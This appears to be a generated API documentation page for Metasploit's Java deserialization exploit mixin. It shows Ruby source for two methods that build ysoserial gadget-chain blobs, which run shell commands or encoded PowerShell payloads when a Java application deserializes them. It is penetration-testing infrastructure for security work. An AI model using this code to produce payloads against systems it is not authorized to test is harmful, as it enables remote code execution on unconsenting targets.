Module: Msf::Exploit::JavaDeserialization

Includes:
Powershell
Defined in:
lib/msf/core/exploit/java_deserialization.rb

Instance Method Summary collapse

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #initialize, #make_subs, #process_subs, #read_script, #run_hidden_psh

Instance Method Details

#generate_java_deserialization_for_command(name, shell, command) ⇒ String

Generate a binary blob that when deserialized by Java will execute the specified command using the platform-specific shell. Many deserialization gadget chains pass the command to `Runtime.getRuntime().exec()` as a string which has limitations on characters in the command such as whitespace and quotes. Using a specific shell will cause the command to be invoked as an array using that shell and thus work around those limitations.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • shell (String)

    The shell to use for executing the command. Must be one of bash, cmd or powershell.

  • command (String)

    The OS command to execute.

Returns:

  • (String)

    The opaque data blob.


19
20
21
22
23
24
25
26
27
# File 'lib/msf/core/exploit/java_deserialization.rb', line 19

def generate_java_deserialization_for_command(name, shell, command)
  # here we force usage of a modified type to avoid compatibility issues with command characters thar are present in
  # some ysoserial payloads
  unless %w{ bash cmd powershell }.include? shell
    raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
  end

  Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
end

#generate_java_deserialization_for_payload(name, payload) ⇒ String

Generate a binary blob that when deserialized by Java will execute the specified payload. This routine converts the payload automatically based on the platform and architecture. Due to this, not all combinations are supported.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • payload (Msf::EncodedPayload)

    The payload to execute.

Returns:

  • (String)

    The opaque data blob.

Raises:

  • (RuntimeError)

    This raises a RuntimeError of the specified payload can not be automatically converted to an operating system command.


39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# File 'lib/msf/core/exploit/java_deserialization.rb', line 39

def generate_java_deserialization_for_payload(name, payload)
  command = nil

  if payload.platform.platforms == [Msf::Module::Platform::Windows]
    if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
      command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
    elsif payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'cmd'
  else
    if payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'bash'
  end

  if command.nil?
    raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
  end

  generate_java_deserialization_for_command(name, shell, command)
end